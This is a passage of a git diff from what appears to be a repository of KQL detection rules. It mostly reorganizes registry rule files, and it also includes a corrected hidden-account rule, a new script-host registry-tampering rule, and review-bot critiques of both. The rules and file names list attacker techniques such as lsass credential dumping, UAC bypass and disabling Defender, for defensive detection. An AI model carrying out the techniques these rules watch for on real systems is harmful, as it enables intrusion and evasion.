rename to KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
diff --git a/KQL/rules/Privilege Escalation/atbroker_registry_change.kql b/KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/atbroker_registry_change.kql
rename to KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql
diff --git a/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql b/KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql
rename to KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql
diff --git a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql b/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql
similarity index 91%
rename from KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql
rename to KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql
index a2864eb6..5911f687 100644
--- a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql
+++ b/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql
@@ -7,4 +7,4 @@
 // Tags: attack.persistence, attack.t1136.001
 
 DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$"
\ No newline at end of file
+| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql b/KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/dll_load_via_lsass.kql
rename to KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql
diff --git a/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql b/KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
rename to KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
diff --git a/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql b/KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql
similarity index 100%
rename from KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql
rename to KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql
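Review bot: The new predicate combines `RegistryKey endswith "...\\Users\\Names*"` with `RegistryKey endswith "$\\(Default)"`, two `endswith` tests on the same column that cannot both be true, so this rule can never return a row (the literal `*` was already dead, since KQL `endswith` does not expand wildcards). The first test reads like it was meant as a path-prefix check: `RegistryKey contains "\\SAM\\SAM\\Domains\\Account\\Users\\Names\\" and RegistryKey endswith "$"`. Whether `(Default)` should be checked at all depends on how this table reports default-value writes; if the value name is exposed in a separate column that is where it belongs, otherwise keep the `$` suffix the old line had.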
diff --git a/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql b/KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql
similarity index 100%
rename from KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql
rename to KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql
diff --git a/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql b/KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql
rename to KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql
diff --git a/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql b/KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql
rename to KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql
diff --git a/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql b/KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql
rename to KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql
diff --git a/KQL/rules/Persistence/office_application_startup_office_test.kql b/KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql
similarity index 100%
rename from KQL/rules/Persistence/office_application_startup_office_test.kql
rename to KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql
diff --git a/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql b/KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql
similarity index 100%
rename from KQL/rules/Persistence/path_to_screensaver_binary_modified.kql
rename to KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql b/KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
similarity index 100%
rename from KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
rename to KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
diff --git a/KQL/rules/Persistence/potential_qakbot_registry_activity.kql b/KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_qakbot_registry_activity.kql
rename to KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql
diff --git a/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql b/KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql
similarity index 100%
rename from KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql
rename to KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql
diff --git a/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql b/KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql
rename to KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql
diff --git a/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql b/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql
new file mode 100644
index 00000000..fb18677c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql
@@ -0,0 +1,14 @@
+// Title: Registry Tampering by Potentially Suspicious Processes
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-08-13
+// Level: medium
+// Description: Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.
+// These processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry
+// without using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112, attack.t1059.005
+// False Positives:
+// - Some legitimate admin or install scripts may use these processes for registry modifications.
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql b/KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/run_once_task_configuration_in_registry.kql
rename to KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql
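Review bot: The Description names only WScript and CScript, while the query also keys on `\\mshta.exe`, and the sentence repeats "such as"; suggest `// Description: Detects registry modifications made by script-host processes (mshta.exe, wscript.exe, cscript.exe), which are rarely used for legitimate registry changes and may indicate tampering that avoids regedit.exe or reg.exe.` The predicate places no constraint on the key or value written, so every registry write from a logon or install script will be raised at medium; the False Positives section would be more useful if it said so and named `RegistryKey` prefix exclusions as the expected tuning knob. Whether the rule is meant to carry such exclusions itself is not visible from this hunk.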
diff --git a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql
rename to KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql
diff --git a/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql b/KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql
similarity index 100%
rename from KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql
rename to KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql
diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql b/KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql
rename to KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql
diff --git a/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql b/KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql
similarity index 100%
rename from KQL/rules/Collection/suspicious_camera_and_microphone_access.kql
rename to KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql b/KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql
rename to KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql b/KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql
rename to KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql
diff --git a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql b/KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql
similarity index 100%
rename from KQL/rules/Persistence/wdigest_credguard_registry_modification.kql
rename to KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql
diff --git a/KQL/rules/Credential Access/windows_credential_editor_registry.kql b/KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql
similarity index 100%
rename from KQL/rules/Credential Access/windows_credential_editor_registry.kql
rename to KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql
diff --git a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
rename to KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql
diff --git a/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql b/KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql
similarity index 100%
rename from KQL/rules/Initial Access/windows_registry_trust_record_modification.kql
rename to KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql
diff --git a/KQL/rules/Privilege Escalation/winekey_registry_modification.kql b/KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/winekey_registry_modification.kql
rename to KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql
diff --git a/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql b/KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql
similarity index 100%
rename from KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql
rename to KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql
diff --git a/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql
similarity index 100%
rename from KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql
rename to KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql
diff --git a/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql
similarity index 100%
rename from KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql
rename to KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql
diff --git a/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql b/KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql
rename to KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql
diff --git a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql b/KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
rename to KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql
diff --git a/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql b/KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql
similarity index 100%
rename from KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql
rename to KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql
diff --git a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
rename to KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql
rename to KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql
rename to KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
rename to KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql
diff --git a/KQL/rules/Persistence/change_the_fax_dll.kql b/KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql
similarity index 100%
rename from KQL/rules/Persistence/change_the_fax_dll.kql
rename to KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql
diff --git a/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql b/KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql
similarity index 100%
rename from KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql
rename to KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql
diff --git a/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql b/KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql
rename to KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql
diff --git a/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql
rename to KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql
diff --git a/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql b/KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql
similarity index 100%
rename from KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql
rename to KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql
diff --git a/KQL/rules/Persistence/com_hijack_via_sdclt.kql b/KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql
similarity index 100%
rename from KQL/rules/Persistence/com_hijack_via_sdclt.kql
rename to KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql
diff --git a/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql b/KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql
rename to KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql
diff --git a/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql b/KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql
rename to KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql
diff --git a/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql
rename to KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql
diff --git a/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql b/KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql
similarity index 100%
rename from KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql
rename to KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql
diff --git a/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql
rename to KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql
diff --git a/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql
rename to KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql
diff --git a/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql
rename to KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql
diff --git a/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql b/KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql
rename to KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql
diff --git a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
rename to KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql
diff --git a/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql b/KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql
rename to KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql
diff --git a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql
rename to KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql
diff --git a/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql b/KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql
rename to KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql
diff --git a/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql
rename to KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql
diff --git a/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql b/KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql
rename to KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql
diff --git a/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql b/KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql
rename to KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql
diff --git a/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql b/KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql
rename to KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql
diff --git a/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql b/KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql
rename to KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql
diff --git a/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql
rename to KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql
diff --git a/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql
rename to KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql
diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql b/KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql
rename to KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql
diff --git a/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql b/KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql
rename to KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql
diff --git a/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql b/KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql
rename to KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql
diff --git a/KQL/rules/Persistence/disable_windows_security_center_notifications.kql b/KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql
similarity index 100%
rename from KQL/rules/Persistence/disable_windows_security_center_notifications.kql
rename to KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql
diff --git a/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql b/KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql
rename to KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql
diff --git a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql b/KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql
rename to KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql
diff --git a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql b/KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
rename to KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql
diff --git a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql
rename to KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql
diff --git a/KQL/rules/Persistence/enable_lm_hash_storage.kql b/KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql
similarity index 100%
rename from KQL/rules/Persistence/enable_lm_hash_storage.kql
rename to KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql
diff --git a/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql b/KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql
rename to KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql
diff --git a/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql b/KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql
similarity index 100%
rename from KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql
rename to KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql
diff --git a/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql b/KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql
similarity index 100%
rename from KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql
rename to KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql
diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql
similarity index 100%
rename from KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql
rename to KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql
diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql
similarity index 100%
rename from KQL/rules/Persistence/etw_logging_disabled_for_scm.kql
rename to KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql
diff --git a/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql
rename to KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql
diff --git a/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql b/KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql
rename to KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql
diff --git a/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql b/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql
new file mode 100644
index 00000000..7b4053da
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql
@@ -0,0 +1,10 @@
+// Title: FileFix - Command Evidence in TypedPaths
+// Author: Alfie Champion (delivr.to), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-05
+// Level: high
+// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
+// MITRE Tactic: Execution
